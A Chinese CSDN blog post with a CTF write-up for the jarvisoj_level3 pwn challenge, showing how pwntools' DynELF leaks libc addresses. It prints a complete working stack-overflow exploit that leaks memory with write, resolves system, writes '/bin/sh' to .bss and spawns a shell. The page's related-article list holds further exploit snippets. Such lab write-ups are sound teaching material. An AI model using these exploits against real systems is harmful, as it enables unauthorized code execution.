记一个 DynELF 的使用例子

最新推荐文章于 2024-10-01 09:15:46 发布
最新推荐文章于 2024-10-01 09:15:46 发布
阅读量139 收藏
点赞数
分类专栏: Pwn 文章标签: linux python 网络 网络安全 学习 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/129263472
版权

题目:jarvisoj_level3

from pwn import *

context.log_level = 'debug'

io = process("/home/Kaguya/桌面/Resolve/level3")
elf=ELF("/home/Kaguya/桌面/Resolve/level3")
 
write_addr = elf.symbols['write']
vulner_addr = elf.symbols['vulnerable_function']
write_got = elf.got['write']
main = elf.sym['main']
read_plt = elf.symbols['read']
bss_addr = elf.bss()
 
padding = b'A' * ( 0x88 + 0x04 )
 
def leak(address):
    payload = padding + p32(write_addr) + p32(main) + p32(1) + p32(address) + p32(4)
    io.recvuntil(b'Input:\n')
    io.send(payload)
    data = io.recv(4)
    return data 

d = DynELF(leak, elf=ELF("/home/Kaguya/桌面/Resolve/level3"))
systemAddress = d.lookup('system', 'libc')
 
payload2 = padding + p32(read_plt) + p32(vulner_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)
io.send(payload2)
io.send(b'/bin/sh\x00')
 
payload3 = padding + p32(systemAddress)  + p32(0) + p32(bss_addr)
io.sendline(payload3)
io.interactive()

def leak(address):
    payload = padding + p32(write_addr) + p32(main) + p32(1) + p32(address) + p32(4)
    io.recvuntil(b'Input:\n')
    io.send(payload)
    data = io.recv(4)
    return data 

d = DynELF(leak, elf=ELF("/home/Kaguya/桌面/Resolve/level3"))
systemAddress = d.lookup('system', 'libc')

DynELF不能直接泄露/bin/sh的地址,因此需要使用read函数手动输入。

但是相比之下DynELF的优势是快,并且用起来简单。

实际上操作DynELF比较麻烦,也容易报错,可能是我自己的问题。

并且需要联网,不能比赛使用。

无论如何也是一种做题的方法,记一笔。

Red-Leaves
关注
专栏目录
栈溢出利用之DynELF实例
M021的专栏
10-07 4145
无libc库函数时,利用DynELF实现漏洞利用
pwn libc之Dynelf工具
清霂的博客
04-02 539
目录pwn-100pwn-200welpwn Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是"/bin/sh"的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取"/bin/sh" pwn-100 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="amd64", log_level="debug") contentt = 1 #elf e
Pwn-栈溢出之DynELF
CharlesGodX的博客
03-08 913
0x00:前言 DynELF方法适用于没有libc的情况,我们可以通过DynELF方法来实现泄露system函数的地址,那么DynELF是什么呢?在pwntools官方文档有介绍,简单而言就是通过leak方法反复进入main函数中查询libc中的内容,其代码框架如下 p = process('./xxx') def leak(address): payload = "xxxxxxxx" + a...
初探ROP攻击 Memory Leak & DynELF
HiTaQini
11-28 6143
前言通过泄露内存的方式可以获取目标程序libc中各函数的地址,这种攻击方式可以绕过地址随机化保护。下文通过一个例子讨论泄露内存的ROP攻击。 (ps.本文中的源代码大家可以去我的Github中下载,链接在文章结尾。实践才会出真知啊~)
python3-pwntools教程_PwnTools常见用法
weixin_30539747的博客
12-23 1078
pwntools是一个ctf框架,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。安装:pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch,FreeBSD, OSX, 等等,徐州软件开发公司徐州徐软信息科技有限公司建议您确保安装以下系统库。BinutilsUbuntuMac OS XAlternate ...
Pwntools 2022简明手册
热门推荐
kelxLZ的博客
02-26 1万+
Author:ZERO-A-ONE Date:2022-02-24 本文翻译自:https://github.com/Gallopsled/pwntools-tutorial,主要是考虑到目前中文互联网中关于系统介绍pwntools使用方法的文章都比较老和杂乱,且转换为Python3后又有许多零零散散的问题,看到这个仓库中包含了很多使用技巧和调试问题的解决方案,感到可以翻译一下 这个资源库包含了一些开始使用pwntools(和pwntools)的基本教程。 这些教程并不致力于解释逆向工程或利用,而是.
基于 CTF-wiki 的学习 及实现 edb-debuger测试原理与脚本原理讲解版
QX_XDE的博客
04-24 1061
ctf-wiki学习,pwn题目原理讲解
Pwn学习历程 ---- 基本工具、交互、调试
子曰小玖的博客
05-21 5940
https://blog.csdn.net/gyhgx/article/details/53439417 从基础开始 简单原理介绍 以下内容摘自Wiki: Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”Yo...
S2e-env环境及编译学习1
luke_lx的博客
01-22 1895
Ⅰ、S2e符号执行概述 Ⅱ、前言 对于S2E做符号执行,当前只是了解一些表面的功能,因此本文只是大致录本人对于s2e和符号执行的一点粗浅认识仅供初学者参考。如果谬误之处,还希望大家指正,谢谢。 一、S2E和符号执行 首先简单描述一下什么是符号执行。我们平常执行程序的时候,使用的都是具体值来执行程序,得到输出。这种执行方式称为实际(具体)执行(concolic execution)。在使用不同的具体值执行程序时,程序可能走不同的路径,执行的行为就可能存在差异。那么怎么才能知道程序可能存在哪些执行路径,进而去
pwntools中DynELF使用
weixin_41038905的博客
04-19 890
DynELF是pwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 本文exp以攻防世界中的pwn-100为例 from pwn import * p = process('./pwn-100...
XCTF pwn-100(使用DynELF)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-14 333
from pwn import * #p = process("./pwn-100") p = remote("111.198.29.45",37259) elf = ELF("./pwn-100") read_got = elf.got['read'] puts_plt = elf.plt['puts'] start = 0x400550 pop_rdi = 0x400763 #ROPgad...
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 364
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
在 Kali Linux 中安装 Impacket
weixin_44023460的博客
09-30 230
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket。
Linux 安装redis主从模式+哨兵模式3台节点
一千个读者就有一千个哈姆雷特
09-27 407
Linux 安装redis主从模式+哨兵模式3台节点
[Linux]:线程(一)
Bettysweetyaaa的博客
09-26 750
想深入了解线程吗?本文将为你详细解读线程的概念、优缺点、异常及用途,还介绍了 Linux 中线程的控制方法。快来阅读,提升你的编程技能,探索多线程的奥秘!
linux 源代码编译
Lxn2zh的博客
09-27 1351
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
Linux下send函数和recv函数
最新发布
威桑的博客
10-01 323
Linux下send和recv
linux---进程程序替换详解
m0_74979625的博客
09-26 447
其实也挺容易理解的,程序替换是涉及到内核的,为了保证安全性,操作系统提供了系统调用,一旦涉及了系统调用,用户态立刻变为了内核态,控制权就交给了操作系统。验证:先自己建一个环境变量的表argv2,然后程序替换后打印所有的环境变量,我们可以看到环境变量已经被覆盖了,新程序的environ指针也指向了这个新的环境变量表。第一个参数是程序文件的路径,程序也是个文件,它存储在磁盘中,后面的参数就是执行这个程序需要的参数。这个函数就没有可变参数了,p表示它会根据你的文件名,去环境变量path中查找,v就是数组的意思。
字符串拼接实现pwn
12-03
下面是一个简单的例子,演示了如何使用字符串拼接实现pwn: 假设有一个程序存在格式化字符串漏洞,我们需要构造一个payload来执行system("/bin/sh")。首先,我们需要获取system函数的地址,可以使用pwntools中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值